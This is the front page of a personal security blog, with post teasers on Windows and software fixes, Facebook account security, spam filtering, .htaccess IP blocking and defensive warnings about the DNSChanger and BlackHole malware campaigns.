Wiz's Computer and Website Security Blog

Back in 2016, I wrote a blog article detailing how I got Logitech SetPoint to startup with Windows. Until I found the fix, SetPoint installed and I could open and manage it, but it simply wouldn't auto-launch when I logged into Windows or install its icon in the "System Tray." Fast forward 7 years and a new problem popped up with SetPoint not working right on a newly acquired Windows 10 laptop computer.

This new problem is that even though I was able to install SetPoint on my new to me Dell Latitude laptop, I was unable to launch/open the program to manage it. The installer completed and there was a shortcut on the Start Menu. But, clicking on the icon and shortcut did absolutely nothing. When I opened the folder containing the program's executable, Setpoint.exe, and clicked on it, I got a popup error message from Windows complaining that "the side by side configuration is incorrect."

Before I stumbled onto the actual fix, I tried all kinds of suggestions I found on various troubleshooting forums. I downloaded old versions of Microsoft Visual C++ packages in the hopes that the program was looking for long outdated missing components. I even tried a suggestion to run the program in Windows 7 Compatibility mode. Nope, none of this worked. ;-( So, I began following my own hunches based upon decades of experience operating and upgrading Windows computers.

Continue reading "Fix for Logitech Setpoint won't open on Windows 10 in 2023" »

Posted by Wiz at 6:50 PM | Permalink

back to top ^

I recently helped a Facebook friend secure his account after he accidentally got it hacked by a Nigerian 419 scammer/fraudster. The fraudster was using my friend's account to send scams to people on his Friends list via Facebook Messenger. He needed to change his Facebook password, but didn't know where to do it. This article describes how to do that.

If you are using the Facebook App (not a web browser) on a phone, tablet, or touch screen laptop computer, login to Facebook via the screen or desktop icon. Look at the icons along the top of your Facebook profile. At the far right is an icon with three horizontal lines. Touch that icon. A page opens labeled "Menu" on the upper left. To the right of the word Menu is a gear icon. Touch the gear icon to open your "Settings & Privacy" then follow these steps...

1. Under the heading "Account" is a link labeled "Password and Security." When you press this link the first option is to check your "Important Security Settings." Do that and fix any serious issues.
2. Afterward, come back to the Password & Security page and look under the heading: "Login" - where you will see: "Change password." Press that link and follow the on-screen instructions.
3. Do not reuse an old password as they get stolen from hacked online databases. Create a strong new password that can't be guessed by a random stranger or a hack-bot using a dictionary attack to crack known words. Better yet, if your browser offers to create a strong password, let it and have the browser save/remember it.
4. Note, you might have to add a punctuation mark, capital letter, or a number to the new password if the input field complains that the password must contain at least one of this or that character.

If you are using Facebook in a web browser, rather than an App, on a desktop or laptop computer, read the extended content for instructions for changing your Facebook password.

Continue reading "Securing your Facebook account" »

Posted by Wiz at 10:34 AM | Permalink

back to top ^

April 8, 2018

If you are a user of Acronis True Image Home 2018, for Windows, you may have tried to enable non-stop backups for folders you frequently work on. Perhaps you've encountered an error message in your System Tray saying: "Nonstop backup is stopped." If so, read on about how I solved this very problem on my own PC.

I have been using Acronis True Image for almost a decade and currently run version 2018, which I just upgraded from version 2017 (learn more about Acronis True Image on my affiliate page). My new computer is self-built (as they always have been), so I had to setup all new backups and settings. One option I decided to try out is called nonstop backups. This feature has been around for a few years, but I never explored it before.

Non-stop backups watch for changes made in your primary Documents and Pictures folders, plus a few more default folders. You can also add custom locations to monitor for changes. The Acronis nonstop backup engine checks for changed files every 5 minutes or so and saves those changes to a special folder that is saved to a drive of your choice. It is mostly useful to Webmasters, authors, tax preparers and accountants who make frequent changes/edits to files. If a protected file gets screwed up or accidentally deleted, a very recent copy can be restored very quickly via the Acronis True Image program interface. It's free with the program, so consider it another layer of backups.

After setting up my preferred folders to monitor, I selected my external USB 3.0 "My Passport" drive as the destination and enabled the feature. At first it appeared to be working, having created a hidden folder on the external drive. But, a day later, when I checked the icons in my Windows 10 System Tray (a.k.a: Systray, which contains important icons normally hidden behind an up pointing arrow, on the right side of the Windows Taskbar, near the system clock.), the icon informed me that "Nonstop Backup is Stopped." This led me into an online searching frenzy where I finally found the golden words that led to a solution to this mystery.

Continue reading "Acronis True Image Nonstop Backup Is Stopped - Solved" »

Posted by Wiz at 4:17 PM | Permalink

back to top ^

July 9, 2017

On the 4th of July I wrote an article explaining how you can use Regular Expressions (RegEx) to create spam filters that can be applied to a mail server for your commercially hosted domains. This article shows how to create RegEx filters to block spam based on the IP addresses of the mail servers found in the headers of incoming emails.

If you haven't read the first article in this series, I recommend you do so now. It has lots of important information that this article builds upon. It will open in a new tab so you can refer to it as necessary.

Email messages contain a section that is normally hidden from view when you read the body text. It is called the email headers and they contain the actual routing details for each incoming and outgoing message. Some of those details can be forged by spammers and frequently are. But, others are not easily forged, including certain numeric entries that relate to the IP addresses of the email servers through which the message has passed.

So, without any further ado, let's look at a spam filter to block unwanted IP addresses.

Continue reading "Use RegEx to filter spam from your mail server - part 2" »

Posted by Wiz at 7:25 PM | Permalink

back to top ^

July 2, 2017

If, like me, your website is on a shared hosting account, you can block unwanted traffic via an IP blocklist in your .htaccess file. This could be from hackers, scammers, spammers or automated probes for unpatched exploitable files.

What is .htaccess?

The file named .htaccess is a normally hidden server configuration file used by Apache web servers. Since most of the shared hosting websites run on this open source Apache software, the .htaccess file lets the webmaster control access to all or parts of the website under his or her personal control. The leading dot in the file name tells the Apache server that it is a special control file and to hide it from standard view. If you use a desktop FTP program to upload files to your website, you will have to find the settings option to show hidden files.

Read detailed information about how to use .htaccess here

Before you read any further, note that when editing or creating a .htaccess file, one incorrect or misplaced character or misspelled word, or even a missing required space can cause "Server 500" error that locks everybody out from viewing the website from the Internet, including you! Extreme caution and immediate followup online testing is required when altering a .htaccess file.

One of the important things you need to know when editing a .htaccess file is that personal comments and notes that are not actual commands must be proceeded with a # character at the start of every unwrapped line of text, or after you press Enter to create a new line (or paragraph) of text. You cannot just type in notes without prefixing them with the # character or you will cause a Server 500 lockout error.

Example of a properly formatted .htaccess personal note or comment:
# This is a note to myself. The following directives will block Chinese traffic

You must also learn which spellings and directives (aka commands) are allowed and which are not. A misspelled directive won't just be ignored. It will cause a Server 500 error. Note that some web hosting companies may not allow you to create or alter a .htaccess file without their express permission (then call or email them). Fortunately, those are few and far between. I can tell you with direct knowledge that Bluehost allows individual .htaccess files to be created and edited.

So, assuming you know how to safely edit your .htaccess file, let's delve into how my IP blocklists can help protect your Apache server shared hosting website from online hacks and probes.

Continue reading "Protect your hosted websites from hackers with my .htaccess blocklists" »

Posted by Wiz at 2:06 PM | Permalink

back to top ^

May 27, 2017

Anybody who has read my computer forum posts and blog articles over the years knows that I am a proponent of using less privileged computer user accounts for daily use, rather than an Administrator account. While you may have a few extra hoops to jump through, they aren't that complicated. And, you will greatly reduce your likelihood of having your computer compromised by well over 90% of the malware in circulation today (see footnotes).

Why you should not operate a Windows PC from an Administrator account for your daily browsing and email.

Most computer malware targets Windows operating systems and usually depends on installing malicious files and "backdoors" into operating system folders, and/or modifying legitimate system files to do illegal things (like sending spam, participating in distributed denial of service attacks, hosting credential phishing web pages or pages promoting useless herbs and dangerous counterfeit drugs, installing keyloggers that steal your login credentials, downloading fake security and extortion programs, theft of confidential documents, etc). Only administrator accounts have permission to install such files into system folders, or modify system files and settings. Once in the system folders, the cybercriminals behind the malware may have total control over that computer. This is referred to by hackers and Botmasters as being "Pwned."

Some malware attacks target your web browsers and their components and plug-ins (like Flash Player, Java, PDF readers and other media players). Many Ransomware attacks come via hostile email attachments or poisoned links to compromised websites. Still other attacks are Internet "Worms" that scan computers connected to the Internet looking to exploit new and old vulnerabilities in various Windows operating systems, or Microsoft Office programs. If an exploit attack isn't blocked by up-to-date anti-malware protection, and it detects that the account in use has administrator privileges, the exploit script will continue until it is fully entrenched, often without any user interaction until it's too late.

However, if the same attacks as above (written to infiltrate system files and folders) are launched against a computer that is running as a less privileged account, the malware installation will likely fail and exit. Or sensing that it requires higher privileges, it may open UAC boxes asking for your administrator password and permission to install it. Unless you are tricked into allowing this to happen, refusing to grant this permission will halt the malware, or severely limit its impact. Your own user account could still be compromised, but not other password protected user accounts or operating system files (which also includes "Program Files").

The rest of this article deals with the steps to take to change your Administrator user account into a less privileged Standard User account on a Windows 10 computer.

Continue reading "The nuts and bolts of operating as a less privileged computer user" »

Posted by Wiz at 2:15 AM | Permalink

back to top ^

If you arrived here while searching for help for Logitech SetPoint installs, but won't open due to a side by side configuration error, read the newer article I wrote in August of 2023 about how I solved that problem.

October 16, 2016

I have a self-built computer that I upgraded from Windows 7 to Windows 10. It was recently upgraded to the Anniversary version; build 1607. Shortly thereafter, I began noticing that the double click action I had chosen for the wheel button on my Logitech M300 mouse was no longer happening. Here's how I fixed it!

At first I thought it was just a glitch, until the day I went to access the SetPoint icon in the System Tray - which had always been there - and found that it was no longer there. Rebooting had no effect either. Pfft, the icon was gone!

The missing System Tray (Systray) icon was responsible for all custom mouse settings and its disappearance left me with only basic mouse actions. So, I began my troubleshooting by reinstalling SetPoint. Despite the process going through to completion, the icon did not reappear in the Systray. I then went to Logitech.com and downloaded the most recent version of SetPoint and installed it. Still, no Systray icon and no settings that survived a reboot.

I then Googled the problem and found all kinds of people were having the same issue. Some were running Windows 10, others Windows 8. Evidently, some update broke the installation of the SetPoint Systray file, SetPoint.exe, and its icon. Unfortunately, none of the suggestions I read fixed my problem. So, I used my own intuition and ended up fixing it myself (this ain't my first rodeo).

Continue reading "Fix for Logitech SetPoint doesn't launch with Windows 10" »

Posted by Wiz at 12:20 AM | Permalink

back to top ^

May 30, 2016

My First Windows 10 Upgrade Attempt

Prior to using Windows 10, my current self built computer ran on Windows 7 Home Premium. I kept it up to date with Service Pack 1 (the only one released for Windows 7) and all important Windows updates, as well as all third party programs I installed and browser plug-ins and add-ons. Very importantly, I operated as a Windows 7 "Standard User", not as an Administrator. Read why you should operate as a less privileged user.

I have never been afraid to experiment with my computers, all of which I built from scratch. I have updated every one to a newer O.S. since my first Windows 3.1 PC was upgraded to Windows 95. I still have floppy disks to prove it!

And so it happened that when Windows 10 was made available to the public during the Fall of 2015, I went for the free upgrade (saving an Acronis full system image, plus a Windows 7 Backup image, just in case). Nothing went right that time, with many programs crashing or failing to open properly, including the new to me XAML Start menu and notifications window. Fortunately for upgraders, Windows 10 allows us a 30 day grace period to roll back to our previous operating system. After that your Windows 7 license expires and you are locked into Windows 10. So, I used the built-in recovery option to roll back to Windows 7, which had some icons with padlocks and wrong permissions issues, but otherwise went smoothly, and waited for improvements to be made to Windows 10. Two months later I was ready to try again!

Continue reading "How I restored sanity to my Windows 10 upgraded computer" »

Posted by Wiz at 12:34 AM | Permalink

back to top ^

October 28, 2015

My primary home computer is a self built Windows 7 Home Premium, 32 bit PC. My secondary computer is a Dell Latitude laptop, which I keep in my shop. Back in early September, I upgraded the laptop from Windows 7 to Windows 10. To this day, everything has continued to work excellently on the laptop. Based on that success I decided to try upgrading my main "production" computer to Windows 10.

After trying out Windows 10 for three days in October, 2015, I encountered some software compatibility and windows update problems that left me more and more aggravated. I decided that I would downgrade the computer to Windows 7 and wait for more updates to both Windows 10 and hopefully, some of the affected programs.

Since I chose to downgrade/rollback to my previous O.S. within 30 days, that option was found in the Start menu by clicking on "Settings" > "Update & Security" > "Recovery." You should see a "Go back to Windows (7 | 8 | 8.1)" option, with a "Get Started" button. Click on Get Started and answer the questionnaire about why you want to roll back, then click "Next" to continue the downgrade process.

Note: if more than 30 days has passed since you upgraded to Windows 10, the rollback option will disappear. You will have to restore from a saved image file, or do a clean install of your previous operating system.

All told, the rollback to Windows 7 went fairly well, as my accounts and settings were still intact and my installed programs still functioned as before. However, some things got screwed up in the process. Among those screw-ups, after downgrading and logging back into Windows 7, many desktop icons now had a padlock in the icons, where shortcut arrows used to be. This happened to my Administrator level and Standard User accounts.

Those locks were never there before! It took a little sleuthing to learn a fix for this event, as well as to understand what caused it. Here's how I fixed them and a few other new problems.

Continue reading "Fix for Desktop icons have padlocks after downgrading from Win 10 to Win 7" »

Posted by Wiz at 7:20 PM | Permalink

back to top ^

July 9, 2015

Ever since the appearance of the Get Windows 10 icon in the System Tray of my Windows 7 Home Premium self-built pc, the screen that I clicked on always opened totally blank. I read all kinds of forums and applied every recommended update. I even tried running the McAfee uninstaller, despite never having had their anti-virus programs installed. However, I did get the McAfee Safety Scanner bundled with some software update in the past. Running it did not fix the blank screen problem for me.

I finally found the solution to the blank Get Windows 10 screen on my own and will share it with you all. I also own a Dell Latitude laptop running Windows 7 Home Premium and it is displaying the Get Windows 10 screen information properly. Out of curiosity, I opened its Status screen yesterday to watch what actually occurred as it loaded. I noticed a distinct click sound as the W10 Reserved details populated the window. A lightbulb turned on in my befuddled brain!

Today, on my home built Windows 7 Home Premium pc, I solved the blank Get Windows 10 screen problem that has eluded me for most of a month, since the icon first appeared in my SysTray. It was a pure hunch that paid off.

Continue reading "I found a solution to the blank Get Windows 10 screens" »

Posted by Wiz at 12:52 PM | Permalink

back to top ^

June 1, 2014

It seems to me that no matter what other types of email spam I get, Russian fake pharmacy links are always showing up. It appears to be their fallback money maker when other scams fail. This article describes how Windows Live Mail users can create a spam filter that blocks Russian domain messages.

If you are one of the many people Worldwide who bought into MailWasher Pro, you are probably already aware of and using my published MailWasher Pro Spam Filters. If you are monitoring that page using ChangeDetection.com, you are already aware of how frequently I have been updating my filters to respond to new spam tricks. I do this on a voluntary basis, working on my own time, with only a donate button to offer any chance of a payment.

While my spam filters can be added to MailWasher Pro using a simple, well documented procedure (explained on my filters page), folks using other email clients have to do more work to use them. Most modern desktop email clients and several of the better web browser based email systems allow users to create their own spam filters. The ones that work the best allow the use of Regular Expressions and multiple conditions (logical "AND" or "OR"). Windows Live Mail (WLM) has a half-decent spam rule system, that although it doesn't allow for Regular Expressions, can be used to at least approximate many of my spam filters. Instead of being able to combine multiple words or phrases into single line rules, WLM forces us to use plain text, one word or phrase at a time, which can then be combined using either AND or OR conditions. Rules can be set for various email fields, including the more important From, Subject and Body. The following is a rule I created to demonstrate how one might filter out Russian domain scam.

My definition of Russian domain spam includes email messages with Russian domains in the From field as well as in the message body. Russian domain names end in the Country Code: .RU (plus a few related former Soviet Union Country codes).

Continue reading "Windows Live Mail spam filter rule to delete Russian domain messages" »

Posted by Wiz at 4:31 PM | Permalink

back to top ^

March 12, 2014

Almost everybody who has used an email account to send or receive email has received 'tons' of spam messages promoting the illicit sale of counterfeit male performance drugs, such as Viagra.

These spam email messages often have the words "Viagra" or "Pfizer" in the From (Sender) field, to try to catch the attention of gullible people, imploring them to click on the enclosed links, leading to fake online pharmacies, selling counterfeit drugs, for which the spammers act as paid affiliates.

The folks that do knowingly click on links to buy Viagra (or Cialis, or Levitra) from these fake pharmacies are bypassing the only protection their country's medical system offers: the requirement to consult your physician and be tested to see if you are able to safely use that drug without the risk of serious consequences, and if so, at what dosage. They are placing themselves at serious medical risk by purchasing unregulated drugs that are produced by counterfeiters in Asia.

Most of the fake Viagra pharmacies dispensing Asian drugs are hosted on Russian domains, owned by Russian and Ukrainian drug spam syndicates using payment portals friendly to cybercriminals.

Last, but not least, Americans who purchase prescription drugs from foreign online pharmacies that ship the drugs to the USA, are violating Federal laws that forbid the personal importing of prescription drugs from abroad. Penalties start with seizure of the packages and may go up to fines and imprisonment for repeat offenders or distributors.

If you are not one of the gullible people who click on links in spam messages and are not interested in even seeing this kind of garbage in your email client's inbox, read on.

As a long-time spam fighter, I have been writing anti-spam filters for use in MailWasher Pro, which is made by Firetrust Ltd, based in New Zealand. I publish my own MailWasher spam filters for others to use, at no charge (other than the occasional donation). Note that these filters are specific to MailWasher Pro.

Lately, I have received a few requests from non-MailWasher users to show how them my spam filters can be "ported" for use in certain desktop email clients, like the long-deprecated Outlook Express or Windows Live Mail and even to Mac Mail. While I cannot "port" my entire filter set to another program, I can explain how particular filters can be composed in say Windows Live Mail, to do basically the same thing. I'll even go one step further and show how Webmasters and domain owners who have websites hosted on servers running cPanel can create custom spam filters to block email for counterfeit Pfizer drugs, or anything else that is known spam.

Continue reading "Email filter rules to block spam for counterfeit Pfizer products" »

Posted by Wiz at 7:31 PM | Permalink

back to top ^

October 3, 2013

If you use Comcast Voice services, you are allowed to block just 12 unwanted phone numbers. For most of us, those numbers will be telemarketers. This short article shows you how to block an additional 12 numbers, using the online Comcast.net portal.

You may wonder why you get so many unwanted telemarketing phone calls, even though you have signed up your numbers on the Do Not Call Registry (www.donotcall.gov). The reason is that the people hiring the telemarketers and Robo-callers make much more money in commissions than the fees to make these calls and any fines they face if caught and prosecuted. Ditto for the telemarketing boiler rooms.

So, say you subscribe to Comcast for your home phone service and you are pestered by a lot of telemarketers. You can add their phone numbers to a block list, one at a time, as they come in, via a sequence of keystrokes. Or, you can login to your Comcast.net online account and add these phone numbers to a blocked callers list. That is, until 12 phone numbers have been saved. After that you'll have to delete numbers to add new ones to the Blocked Callers list.

Twelve blocked telemarketers ain't nothin' folks! I know it and you know it. Those pesky bastards keep calling from new numbers as the old ones get blocked by major carriers, or due to occasional action by the FTC. But, blocking 24 numbers would be much more effective, at least for a few months. I'll show you how to do this further in this article.

Continue reading "Comcast Voice users: How to block 24 phone numbers on Comcast.net" »

Posted by Wiz at 1:29 PM | Permalink

back to top ^

December 13, 2012

I first noticed the category assignment problem in November, 2012. I published an article on my MovableType blog and was annoyed when I didn't see the category I checked appear below the category box. I thought I was imagining things and saved the article. The same thing happened with several more articles. Yesterday I published another article and had the same problem of not being able to assign the entry to a category and it got my goat.

Late tonight I got really curious as to why I couldn't assign categories to my entries anymore and set out to discover whether anybody else had the same problem. At 2AM tonight, I found the cause and a solution.

I use Firefox as my default web browser and always upgrade when a new version comes down the stable release channel. Right now I am typing this in Firefox 17.0.1. The version I was using a month ago was 16.x, and I was using Firefox 15.x when I published my last article that I could assign a category to. Something has changed in Firefox, not MovableType!

After a brief Google search for "MovableType can't select categories for entries" I came across a MovableType Community forum topic about this very problem. All affected users were using Firefox 16 and newer, just like me. Fortunately for all of us, MovableType support figured out what had gone wrong in Firefox and has provided us with a patch. Actually, they provided 4 patches, for versions 4.28, 5.07, 5.14 and 5.2. People using any sub-version of MT 4.x should download the patch for MT 4.28. It is backwards compatible across most of v4.

The patch links are found on the community support page titled: Patch file for Firefox 16 users. Choose the file that most closely matches your installation of MovableType.

Continue reading "Fix for MovableType loses ability to assign categories to entries" »

Posted by Wiz at 1:53 AM | Permalink

back to top ^

December 6, 2012

This article is for Firefox version 17+ users who open many tabs at a time in one browser window. If you regularly reposition some tabs and are aggravated with the changes to the way tabs now move to the center of the tab bar when you drag them, I found a solution to revert to the old behavior.

Firefox web browsers are known as tabbed browsers because they allow you to open multiple web pages inside one browser window, each in its own separate clickable tab. Clicking on a tab brings that web page into view, hiding all others behind their clickable tabs. These tabs contain the title of the document, as is displayed in the "Title Bar" that one normally sees on top of a browser window.

When one opens multiple websites, or HTML pages in separate tabs, inside one browser, the tabs line up next to each other, to the right of the previous tab, in the order in which they are launched. Normally, they are launched by the same code that used to cause a new browser window to appear. That HTML code is: target="_blank". If one clicks a hyperlink in an email message from their desktop email client, the web link will open in a new tab all the way to the right side of all previously opened tabs.

The location of the open tabs in the Firefox browser is called the "Tab Bar." By design, users have always been able to drag any tab to a different position in the tab bar. This allows one to position the most important tabs to one side or the other. I usually group my always opened tabs towards the left side of the tab bar, then open or move new tabs to the right of my primary tabs.

Let me describe what I am referring to. In previous versions of Firefox, when one had a lot of tabs open in the tab bar and wanted to relocate one or more tabs, you dragged one tab to the new position and dropped it there. Sometimes, when more than 10 or 12 tabs are open, this required us to move that tab beyond the entire visible row of open tabs. One could see the other tabs move to the right or left at whatever speed you moved the dragged tab at. When you found the desired new location, you let go and there it stayed. If you needed to move a group of related tabs to a new location, you dragged one all the way to the right or left edge and dropped it off. Then, you began dragging the rest next to it and each other, forming a little freight train of tabs. One could do this until the entire group was fully relocated in the tab bar.

The new behavior has made moving ones tabs into a game of chance. The wise guys at Mozilla have animated the tabs that are being dragged so that they remain basically centered in the tab bar, as you drag them around! Move it three browser widths and it is still apparently in the middle of the tab bar. Want to gather other related tabs to the same location? Good luck! Go find them using the right/left arrows, or the master tab finder button at the right edge of the tab bar. Then, you have to drag each one, one at a time to the new location, next to the first one you moved. Each time you drag a tab, it appears stationary and centered, even though it is flying past other tabs. This is most frustrating!

I found a fix that can be added to the browser's configuration page. It is one line of code, with one switch.

Continue reading "How to disable the new tab move centering animation in Firefox 17+" »

Posted by Wiz at 12:47 AM | Permalink

back to top ^

July 19, 2012

For the last few weeks I have been reading security bulletins warning us to turn off the Windows Gadgets sidebar, which is a feature introduced on Windows Vista and continued on 7. Two security researchers, Mickey Shkatov and Toby Kohlenberg, have announced that the Gadgets Platform is basically exploitable and are going to present their evidence in a keynote presentation at the upcoming Black Hat Convention, on July 26, 2012, at Caesars Palace, Las Vegas, Nevada.

According to Black Hat USA 2012 briefings page, here is what these guys are going to reveal: "We will be talking about our research into creating malicious gadgets, misappropriating legitimate gadgets and the sorts of flaws we have found in published gadgets." Once their findings go public, hackers and cybercriminals will begin adding the published exploits to attack kits already in use (like the BlackHole, or Phoenix Exploit Kits). That is when it is going to hit the fan!

The Gadget sidebar is actually the Windows Gadget Platform. Misters Shkatov and Kohlenberg have notified Microsoft about their findings and in response, and without going into any meaningful details, Microsoft has issued a security advisory calling on concerned people everywhere to disable their (Windows Vista and Windows 7) Gadgets and Sidebars!

Here is the warning on the Microsoft Security Advisory (2719662) page:

An attacker who successfully exploited a Gadget vulnerability could run arbitrary code in the context of the current user. If the current user is logged on with administrative user rights, an attacker could take complete control of the affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.

The following paragraphs show two methods of disabling, or re-enabling your Windows Gadgets and Sidebar.

Continue reading "How to disable or re-enable the Windows 7 Gadgets sidebar" »

Posted by Wiz at 1:32 PM | Permalink

back to top ^

July 8, 2012

On March 6, 2012, I wrote an article explaining the extended cutoff date of July 9, 2012, for computers that had been infected with the "DNSChanger" malware, during 2011. That date arrives tomorrow! Are you sure that your computers and routers are not still using the temporary DNS servers soon to be disconnected? If they are, your DNS Server settings are pointing to a temporary Court Ordered interim server that will be disconnected sometime on July 9, 2012.

The reason I am posting this is due to the fact that there are still about 270,000 unique IP addresses using the DNS Server IP addresses that were changed in computers and routers infected by the DNSChanger malware. They are all being rerouted to the temporary DNS Server arranged for by a Court Order obtained by the US FBI, after they took down the servers being used by the Rove Digital criminal enterprise, based in Estonia and had the people involved arrested. The statistic about infected IP addresses is logged by the DNS Changer Working Group (DCWG) and is obtained from access logs from the temporary DNS Servers.

The DCWG website also supplies links to websites around the World where people can go to test their computers and routers in their own languages for evidence of the DNSChanger infection. They also have a page listing numerous free legitimate online security scanners and downloadable security software to identify and remove the DNSChanger malware.

The first thing anybody reading this should do is verify that their own computers and routers are not infected. You can do this by visiting this page at the DCWG. If the results are in green, your connection is not using the so-called "Rogue DNS Servers" setup by the Rove Digital crime gang in Estonia. But, if you see RED, either your computer is still infected, or if disinfected, has not had the proper DNS Server settings restored, or your router has been altered by the malware and needs to be changed to use the DNS Servers belonging to your ISP, or some other preferred DNS provider (e.g. OpenDns, which I use).

What can I do if the test at DCWG says I am infected?

Continue reading "How to restore proper DNS Server settings altered by DNSChanger" »

Posted by Wiz at 11:32 AM | Permalink

back to top ^

A few days ago I discovered an email scam that tries to directly deliver the BlackHole Exploit Kit to victims, inside the message body of those emails. The Subject used was: "Re: URGENT" and the sender addresses spoofed Twitter, LinkedIn and sbcglobal.net customers. In all cases, the hostile code was no longer reached via links, but simply by opening the email in your email client, with HTML display enabled and iframes allowed.

Rather than delving into a big technical discussion about the exploit itself (which I have covered numerous times), this article will attempt to help protect you from being exploited by it, or another like it.

We first need to define how the attack inside these email messages is triggered. This is accomplished by a two pronged attack. One is the exploit code itself is embedded inside the message body, inside <script> tag sets. The second is by means of an HTML "iframe" tag, with the "src" (source) being a remote server or website that is hosting the BlackHole attack kit.

The criminals that sent this to you are hoping to exploit you if your email reader is set to render HTML and scripting. Many users allow these things by default. The second method is used to attack you in the event you disallow scripting, but do allow iframe contents to be rendered. This is a tricky one-two punch.

Here are some ways you can protect your computers from being exploited by the embedded BlackHole attacks.

Continue reading "New email BlackHole exploit attack has embedded JavaScript & iframe" »

Posted by Wiz at 1:22 PM | Permalink

back to top ^

The Internet can be a very dangerous place to place anymore. There are more malicious software (malware) threats out there than you can shake a stick at. The DNS Changer Trojan is one that needs to be mentioned right now. If you own or use a PC infected with the most recent variation of the DNS Changer, you may lose your ability to access the Internet on March 8, 2012.

What does DNS stand for?

DNS stands for Domain Name System. This is a system of electronic devices known as routers which locate websites you want to access by their common name, then translate those names into the numeric codes assigned to the web servers hosting those domains (websites). Every website is hosted on a computer that has a numeric address, known as an IP address, assigned to it. The DNS system searches and drills down through multiple layers of routing details until a numeric match is found for the website domain name you are trying to access.

For instance, my website, wizcrafts.net, is currently hosted on a web server belonging to Bluehost, with an assigned IP address of 66.147.244.184. It is reached after requests are routed from your home or business connection, through any required intermediaries, until the request ends up in Utah, at the facility owned by the hosting company. There, the internal routers sort out which one of hundreds of server in their facility is actually hosting my humble website. All this happens in the blink of your eye!

It's not just websites that use the DNS system. Your very own Internet connection is also part of that system. You get your Internet connection from a local Internet Service Provider (ISP), via a modem, or Wi-Fi, or cellular network, or hard-wired wide area network. Your connection has an IP address assigned to you by your ISP. When you access the Internet to browse websites you are usually going to use DNS servers belonging to your ISP. These DNS servers relay your requests for websites, or other Internet resources, to various upstream Domain Name Servers around the world.

When you connect to your ISP, their system assigns their primary and secondary (in case one fails) DNS servers to you, to use for accessing the Web. You trust those DNS servers to faithfully relay your requests to the desired target websites, or other resources (newsgroups, IRC, IM, email, ftp locations, online storage, etc). But, what if somehow, those good DNS servers belonging to your ISP were replaced with rogue servers owned by cyber-criminals?

Continue reading "PCs infected with DNS Changer to lose Internet connections on March 8, 2012" »

Posted by Wiz at 10:53 AM | Permalink

back to top ^

This article is targeted at security-conscious people who have purchased Trend Micro security programs to protect their PC's and also want to keep an existing installation of Malwarebytes' Anti-Malware on those computers.

I am one of those people. I have a subscription for Trend Micro Titanium Anti-Virus and Malwarebytes' Anti-Malware (MBAM). I recently was notified that I was entitled to a free upgrade to version 2012 of Trend Micro, so I downloaded it from their website. Up to that point both programs were getting along just fine. Ah, but change awaited me.

The upgrade was a simple process that combines uninstalling the previous edition (2011) and installing the newer version (2012). After the uninstaller removes the previous version you are instructed to reboot. Here is where I encountered my first obstacle.

Privileges

I operate as a Windows 7 "Standard User" - which is similar to a Windows XP Pro Power User. That means I have more privileges than a "Limited User" - but less than an Administrator. I like it that way. This type of account reduces my chances of accidental exploitation to single digits (see my articles about privileges, here, here and here). It means that in order to install security programs, or any program requiring access to operating system files, I must use the "Run As Administrator" right-click option when installing such programs.

I was working inside my Standard User account when I received the notice about the free upgrade to Trend Micro 2012, so I ran the installer using Run As Administrator. The first step was to uninstall my existing version (2011) of Trend Micro Titanium, then reboot. Everything went fine until I rebooted into my Standard User account.

Continue reading "How to install MBAM and Trend Micro Internet Security on same PC" »

Posted by Wiz at 11:18 PM | Permalink

back to top ^

For the past week, I have been seeing and reporting (to SpamCop), scam email messages claiming to come from various financial agencies, or banks, with unusual links; all leading to malware servers. This is a continuation of the ACH, FDIC, etc., malware fraud that has been making the rounds for the past few months.

What's different about the links in these new scams is that they are HUGE! They all start out like any normal hyperlink, with a domain name and a particular file. But, appended to the end of the file name is a humongous "query string" (query strings begin with a question mark), containing multiple long groups of letters and numbers, separated by = signs. I have just analyzed one that has 214 alpha-numeric characters in the query string!

But, like octopus ink, things aren't always as they appear to be!

Being a Webmaster and web page writer, it didn't take me long to figure out that the file type that had the query string appended to it was not a valid active content file. Sure, it could possibly have been rigged to be such a file, like a php type, but these are not. They are Plain Jane simple html files, ending in the extension .htm. The .htm file type does not accept any query strings. If you append such a string of characters to it, the server will ignore them completely. All you see is the htm, or html file contents.

All of the rigged links I have traced are placed on compromised websites hosted on Apache web servers. The standard configuration of Apache web servers does NOT parse .htm, or .html files for active content. They are treated as "static" or flat files. No matter what the characters are that follow the file name and extension, the Apache servers where these links are pointing will ignore the phony query strings.

But, the .htm file type link in the scam emails is not where this story ends. The contents of each and every one I have analyzed contains a few simple lines of straight forward HTML code and an "iframe" (inline frame) - which imports a page hosted on a Russian website named csredret.ru (or variation thereof), containing a JavaScript array that leads to targeted attacks based on the brand of browser you are using and the installed plug-ins, especially unpatched versions of Java.

After seeing another such scam email link tonight, I decided to write a spam filter to detect this type of link. I named the filter: "Fake Query String In Link." The filter is for the anti-spam program MailWasher Pro.

Continue reading "MailWasher spam filter for links to .htm files with huge query strings " »

Posted by Wiz at 11:31 PM | Permalink

back to top ^

Just the other day, a friend of mine posted a funny YouTube recording he made of his Grandma calling him with a computer usage question. She wanted to have him tell her what it meant to "copy and paste" something. While some may find the conversation humorous, others new to computers, or those who have never had to copy and paste before and are now faced with having to perform this operation, may want to know what this means and how it is done. I shall endeavor to explain it to you.

What does the phrase "Copy and Paste" mean?

Simply put, it is a technique used by a person using a computer, or hand held digital device (tablet, smart phone, e-reader), to highlight and save a section (or an entire page) of text (see "What is Text") to an electronic storage location in the computer's memory, then insert that copied text into another place where text can be added, on that device, or onto one which is connected to it by a network.

To my knowledge, most, but not all electronic devices or applications that display text, and which allow the use of a key pad or mouse type pointer, usually have a means of allowing the viewer to copy sections, or all of the text displayed on a page, or document, then paste it elsewhere. Exceptions include documents that are specifically copy protected for legal, copyright, or licensing reasons. Furthermore, the device must have some form of electronic memory to save such copied text, until it is pasted, or the device is powered off.

Note: If you read an article and want to copy and paste sections, or all of it to a publicly viewable web location, first read the copyright notice that is usually at the bottom of every web page which contains any copyrighted material. There are stiff fines that can be levied against persons who copy and post someone else's copyrighted articles without express written permission. Copyright holders who are concerned about their rights are able to find and trace content thieves and file charges against them for violation of the DMCA.

Then, Grandma asked my friend: "What is text?"

